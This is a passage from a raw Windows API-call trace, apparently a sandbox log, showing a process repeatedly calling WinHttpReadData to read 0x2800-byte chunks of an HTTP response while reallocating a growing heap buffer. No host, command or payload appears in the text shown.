lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.920] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8680040, Size=0x181000) returned 0x8800040 [0110.948] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x897e840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x897e840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0110.948] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8800040, Size=0x183800) returned 0x8500040 [0110.976] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8681040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8681040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.000] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x186000) returned 0x8690040 [0111.028] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8813840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8813840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.029] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8690040, Size=0x188800) returned 0x8500040 [0111.080] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8686040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8686040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.080] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x18b000) returned 0x8690040 [0111.109] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8818840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8818840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.110] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8690040, Size=0x18d800) returned 0x8500040 [0111.187] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x868b040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x868b040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.190] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x190000) returned 0x8690040 [0111.225] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x881d840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x881d840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.225] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8690040, Size=0x192800) returned 0x8830040 [0111.260] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x89c0040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x89c0040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.260] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8830040, Size=0x195000) returned 0x8500040 [0111.295] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8692840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8692840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.323] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x197800) returned 0x86a0040 [0111.365] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8835040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8835040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.366] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x86a0040, Size=0x19a000) returned 0x8500040 [0111.404] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8697840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8697840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.404] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x19c800) returned 0x86a0040 [0111.475] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x883a040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x883a040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.489] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x86a0040, Size=0x19f000) returned 0x8500040 [0111.530] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x869c840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x869c840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.537] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x1a1800) returned 0x86a0040 [0111.573] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x883f040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x883f040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.574] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x86a0040, Size=0x1a4000) returned 0x8850040 [0111.646] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x89f1840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x89f1840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.647] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8850040, Size=0x1a6800) returned 0x8500040 [0111.687] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x86a4040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x86a4040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.688] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x1a9000) returned 0x86b0040 [0111.730] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8856840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8856840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.731] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x86b0040, Size=0x1ab800) returned 0x8500040 [0111.800] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x86a9040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x86a9040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.801] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x1ae000) returned 0x86b0040 [0111.860] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x885b840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x885b840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.861] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x86b0040, Size=0x1b0800) returned 0x8860040 [0111.901] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8a0e040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8a0e040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.901] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8860040, Size=0x1b3000) returned 0x8500040 [0111.971] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x86b0840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x86b0840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0111.972] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x1b5800) returned 0x86c0040 [0112.012] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8873040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8873040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0112.012] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x86c0040, Size=0x1b8000) returned 0x8500040 [0112.056] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x86b5840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x86b5840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0112.056] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x1ba800) returned 0x86c0040 [0112.148] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8878040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8878040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0112.150] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x86c0040, Size=0x1bd000) returned 0x8500040 [0112.190] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x86ba840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x86ba840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0112.191] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x1bf800) returned 0x86c0040 [0112.232] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x887d040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x887d040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0112.233] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x86c0040, Size=0x1c2000) returned 0x8880040 [0112.307] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8a3f840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8a3f840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0112.308] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8880040, Size=0x1c4800) returned 0x8500040 [0112.350] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x86c2040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x86c2040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0112.351] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x1c7000) returned 0x86d0040 [0112.410] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8894840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8894840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0112.447] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x86d0040, Size=0x1c9800) returned 0x8500040 [0112.487] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x86c7040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x86c7040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0112.488] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x1cc000) returned 0x86d0040 [0112.528] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8899840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8899840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0112.529] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x86d0040, Size=0x1ce800) returned 0x8500040 [0112.575] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x86cc040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x86cc040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0112.601] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x1d1000) returned 0x86d0040 [0112.642] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x889e840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x889e840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0112.643] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x86d0040, Size=0x1d3800) returned 0x88b0040 [0112.686] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8a81040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8a81040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0112.688] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x88b0040, Size=0x1d6000) returned 0x8500040 [0112.733] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x86d3840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x86d3840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0112.762] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x1d8800) returned 0x86e0040 [0112.799] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x88b6040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x88b6040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0112.799] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x86e0040, Size=0x1db000) returned 0x8500040 [0112.837] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x86d8840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x86d8840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0112.839] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x1dd800) returned 0x86e0040 [0112.922] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x88bb040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x88bb040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0112.922] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x86e0040, Size=0x1e0000) returned 0x88c0040 [0112.961] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8a9d840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8a9d840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0112.961] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x88c0040, Size=0x1e2800) returned 0x8500040 [0112.999] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x86e0040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x86e0040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0113.000] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x1e5000) returned 0x86f0040 [0113.036] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x88d2840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x88d2840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0113.084] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x86f0040, Size=0x1e7800) returned 0x8500040 [0113.125] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x86e5040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x86e5040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0113.126] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x1ea000) returned 0x86f0040 [0113.167] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x88d7840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x88d7840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0113.168] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x86f0040, Size=0x1ec800) returned 0x8500040 [0113.273] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x86ea040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x86ea040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0113.283] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x1ef000) returned 0x86f0040 [0113.320] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x88dc840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x88dc840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0113.372] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x86f0040, Size=0x1f1800) returned 0x88e0040 [0113.501] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8acf040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8acf040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0113.589] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x88e0040, Size=0x1f4000) returned 0x8500040 [0113.657] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x86f1840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x86f1840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0113.657] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x1f6800) returned 0x8700040 [0113.698] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x88f4040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x88f4040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0113.700] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8700040, Size=0x1f9000) returned 0x8500040 [0113.761] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x86f6840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x86f6840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0113.762] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x1fb800) returned 0x8700040 [0113.828] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x88f9040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x88f9040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0113.829] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8700040, Size=0x1fe000) returned 0x8500040 [0113.866] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x86fb840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x86fb840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0113.866] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x200800) returned 0x8700040 [0113.903] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x88fe040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x88fe040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0113.905] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8700040, Size=0x203000) returned 0x8910040 [0113.947] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8b10840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8b10840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0113.975] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8910040, Size=0x205800) returned 0x8500040 [0114.018] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8703040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8703040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0114.019] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x208000) returned 0x8710040 [0114.059] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8915840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8915840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0114.060] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8710040, Size=0x20a800) returned 0x8500040 [0114.212] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8708040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8708040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0114.238] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x20d000) returned 0x8710040 [0114.279] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x891a840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x891a840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0114.280] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8710040, Size=0x20f800) returned 0x8500040 [0114.324] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x870d040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x870d040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0114.326] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x212000) returned 0x8710040 [0114.385] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x891f840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x891f840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0114.410] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8710040, Size=0x214800) returned 0x8930040 [0114.450] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8b42040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8b42040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0114.450] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8930040, Size=0x217000) returned 0x8500040 [0114.492] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8714840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8714840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0114.492] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x219800) returned 0x8720040 [0114.558] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8937040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8937040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0114.559] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8720040, Size=0x21c000) returned 0x8500040 [0114.600] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8719840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8719840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0114.600] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x21e800) returned 0x8720040 [0114.681] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x893c040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x893c040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0114.682] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8720040, Size=0x221000) returned 0x8940040 [0114.723] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8b5e840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8b5e840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0114.723] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8940040, Size=0x223800) returned 0x8500040 [0114.775] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8721040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8721040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0114.776] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x226000) returned 0x8730040 [0114.855] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8953840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8953840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0114.855] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8730040, Size=0x228800) returned 0x8500040 [0114.900] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8726040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8726040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0114.901] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x22b000) returned 0x8730040 [0114.942] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8958840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8958840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0114.966] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8730040, Size=0x22d800) returned 0x8500040 [0115.008] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x872b040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x872b040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0115.008] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x230000) returned 0x8730040 [0115.049] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x895d840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x895d840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0115.050] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8730040, Size=0x232800) returned 0x8970040 [0115.134] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8ba0040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8ba0040*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0115.135] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8970040, Size=0x235000) returned 0x8500040 [0115.183] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8732840, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: lpBuffer=0x8732840*, lpdwNumberOfBytesRead=0x7d6f858*=0x2800) returned 1 [0115.184] RtlReAllocateHeap (Heap=0x7f10000, Flags=0x8, Ptr=0x8500040, Size=0x237800) returned 0x8740040 [0115.224] WinHttpReadData (in: hRequest=0x71cad70, lpBuffer=0x8975040, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x7d6f858 | out: 